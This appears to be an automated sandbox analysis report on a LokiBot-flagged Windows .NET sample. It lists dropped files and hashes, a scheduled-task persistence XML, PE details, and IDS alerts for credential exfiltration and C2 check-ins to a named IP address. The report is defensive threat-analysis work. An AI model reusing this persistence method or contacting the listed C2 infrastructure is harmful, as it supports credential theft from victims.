Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YvVDV4cbjy.exe.log

Download File

Process:	C:\Users\user\Desktop\YvVDV4cbjy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379552885213346
Encrypted:	false
SSDEEP:	48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZM0UyuVws:fLHxvCsIfA2KRHmOugr1Vws
MD5:	A8E0D497947F820B1578A90D417338D4
SHA1:	945FF7C68A85BA98DD6077BF821D70C5D553C605
SHA-256:	4626E2474B02F78DBD152878E50A4789514B4975D10D2C6D2FF557C7BCBAA166
SHA-512:	971F39BC7970CA54CF45CB7065ADEA48559404E838BFAC09B4A4CEAD255A08B5D329C8F607CC0BA92B9C5761977BA904BC61A46B77FC40FB19BE582A6EDE3D91
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2icx1gjm.uvl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ggzupuj.1ah.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnhlj0te.r3w.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjsz2jme.zyi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaq1vkgz.mil.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojh1kutt.gfs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owoiebud.fk2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygbynug1.z4t.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp

Download File

Process:	C:\Users\user\Desktop\YvVDV4cbjy.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1581
Entropy (8bit):	5.106948002890861
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtGLxvn:cgergYrFdOFzOzN33ODOiDdKrsuTEv
MD5:	E74C2F78CBF4B8E69E5534C9D65F6556
SHA1:	9838367431A9460D1705F1AA14C37FE9B753F6EA
SHA-256:	AE7D52D79686E3FCBF790FDCD72E6D4CD12436C36A6C93276BF8B9B8EA10B974
SHA-512:	6336F7F3C961B8E0922665C0C587606B72B75BEB8F06F4993B5B145A287FFB703E49E1B55F85259237EC36AB71B1B504B2F2A701A7D2829CF41D3E961CF82145
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp31BF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1581
Entropy (8bit):	5.106948002890861
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtGLxvn:cgergYrFdOFzOzN33ODOiDdKrsuTEv
MD5:	E74C2F78CBF4B8E69E5534C9D65F6556
SHA1:	9838367431A9460D1705F1AA14C37FE9B753F6EA
SHA-256:	AE7D52D79686E3FCBF790FDCD72E6D4CD12436C36A6C93276BF8B9B8EA10B974
SHA-512:	6336F7F3C961B8E0922665C0C587606B72B75BEB8F06F4993B5B145A287FFB703E49E1B55F85259237EC36AB71B1B504B2F2A701A7D2829CF41D3E961CF82145
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\YvVDV4cbjy.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\HxQXdrrQ.exe

Download File

Process:	C:\Users\user\Desktop\YvVDV4cbjy.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	539648
Entropy (8bit):	7.694874785384039
Encrypted:	false
SSDEEP:	12288:gPGqp9ou9WbaMbHkBsy6oaQRCfWksQVJZaoIsfMD:aroIWBrkPXcLXaoZMD
MD5:	DE71DA3A473F5CDB285D30A1D6DD333B
SHA1:	EBB3E9E7FE88C5BA0C24D0411F7A0C04C9E04181
SHA-256:	EE0558D98D1151D6CE6EBB419A05E6DEF3C758F703518648A03C03ED8D830726
SHA-512:	56ABC310955D04AB212C8737C6B1C2EF744F4C0D623FB7E12F4FCB4C8A5D03B9C80D96F225CC022A6ABC09F2EA68700E3EBFBA0B281E52A0E71996C06FA62D8D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....aRg..............0..$..........FB... ...`....@.. ....................................@..................................A..O....`............................................................................... ............... ..H............text...l"... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............:..............@..B................(B......H.......L8..x!...........Y..0...........................................&.(.........0.............X.+......0.............Y.+......0.............Z.+......0............"........,."...?....[.+...0..(.................,...+....Y(.......Y(....X.+...0..!........~.........,.s.........~.....+..*....0..R........r...p..r...p(....t......rc..po.......o......rm..po.....s.......o......+-..(.........(....r...p..(....r...p(....o....&..( ...-...........o!.....("....o#...o$.......ijo%....

C:\Users\user\AppData\Roaming\HxQXdrrQ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\YvVDV4cbjy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\YvVDV4cbjy.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0D7DB7FF842F89A36B58FA2541DE2A6C
SHA1:	50F3B486F99FB22648D26870E7A5CBA01CAED3DA
SHA-256:	140EDA45FE001C0FE47EDD7FC509FF1882D46FBCB7C7437D893C1FB83012E433
SHA-512:	6E6570A7CC802760730DB659A4EDE4221AC2CD944F4B0D97B0A5C8A9F2A072899E3C3FC5DAC336B53F8ACCDE81CBEECA6C5998A1471A2F91EB60E3E13620368D
Malicious:	false
Preview:	...............................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.694874785384039
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	YvVDV4cbjy.exe
File size:	539'648 bytes
MD5:	de71da3a473f5cdb285d30a1d6dd333b
SHA1:	ebb3e9e7fe88c5ba0c24d0411f7a0c04c9e04181
SHA256:	ee0558d98d1151d6ce6ebb419a05e6def3c758f703518648a03c03ed8d830726
SHA512:	56abc310955d04ab212c8737c6b1c2ef744f4c0d623fb7e12f4fcb4c8a5d03b9c80d96f225cc022a6abc09f2ea68700e3ebfba0b281e52a0e71996c06fa62d8d
SSDEEP:	12288:gPGqp9ou9WbaMbHkBsy6oaQRCfWksQVJZaoIsfMD:aroIWBrkPXcLXaoZMD
TLSH:	21B401AC6A42D907CA4057781F71F2742FBC1EEEA901D2139FDD7DEB782AD159C88182
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....aRg..............0..$..........FB... ...`....@.. ....................................@................................

File Icon


Icon Hash:	04852062591b5659

Static PE Info

General

Entrypoint:	0x484246
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x675261CB [Fri Dec 6 02:30:35 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007F7750CABA22h
je 00007F7750CABA22h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007F7750CABA22h
imul eax, dword ptr [eax], 00610076h
je 00007F7750CABA22h
outsd
add byte ptr [edx+00h], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x841f4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x86000	0x13bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x88000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8226c	0x82400	1d758280f4c0402c70993577f9603791	False	0.9117982245681382	data	7.7039906967982645	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x86000	0x13bc	0x1400	e02ab278456f74df5d4c01808b78c926	False	0.732421875	data	6.944434502409531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x88000	0xc	0x200	de86a6051ebb9d7bbe27e8424151498a	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x86100	0xd91	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8692772818888569
RT_GROUP_ICON	0x86ea4	0x14	data	1.05
RT_VERSION	0x86ec8	0x2f4	data	0.43253968253968256
RT_MANIFEST	0x871cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T07:44:25.599550+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49707	94.156.177.41	80	TCP
2025-01-11T07:44:25.599550+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49707	94.156.177.41	80	TCP
2025-01-11T07:44:25.599550+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49707	94.156.177.41	80	TCP
2025-01-11T07:44:26.317949+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49707	94.156.177.41	80	TCP
2025-01-11T07:44:26.514901+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49708	94.156.177.41	80	TCP
2025-01-11T07:44:26.514901+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49708	94.156.177.41	80	TCP
2025-01-11T07:44:26.514901+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49708	94.156.177.41	80	TCP
2025-01-11T07:44:27.217417+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49708	94.156.177.41	80	TCP
2025-01-11T07:44:27.307244+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49709	94.156.177.41	80	TCP
2025-01-11T07:44:27.307244+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49709	94.156.177.41	80	TCP
2025-01-11T07:44:27.307244+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49709	94.156.177.41	80	TCP
2025-01-11T07:44:28.030760+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49709	94.156.177.41	80	TCP
2025-01-11T07:44:28.030760+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49709	94.156.177.41	80	TCP
2025-01-11T07:44:28.191011+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49711	94.156.177.41	80	TCP
2025-01-11T07:44:28.191011+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49711	94.156.177.41	80	TCP
2025-01-11T07:44:28.191011+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49711	94.156.177.41	80	TCP
2025-01-11T07:44:28.931958+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49711	94.156.177.41	80	TCP
2025-01-11T07:44:28.931958+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49711	94.156.177.41	80	TCP
2025-01-11T07:44:29.096261+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49713	94.156.177.41	80	TCP
2025-01-11T07:44:29.096261+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49713	94.156.177.41	80	TCP
2025-01-11T07:44:29.096261+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49713	94.156.177.41	80	TCP
2025-01-11T07:44:29.967134+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49713	94.156.177.41	80	TCP
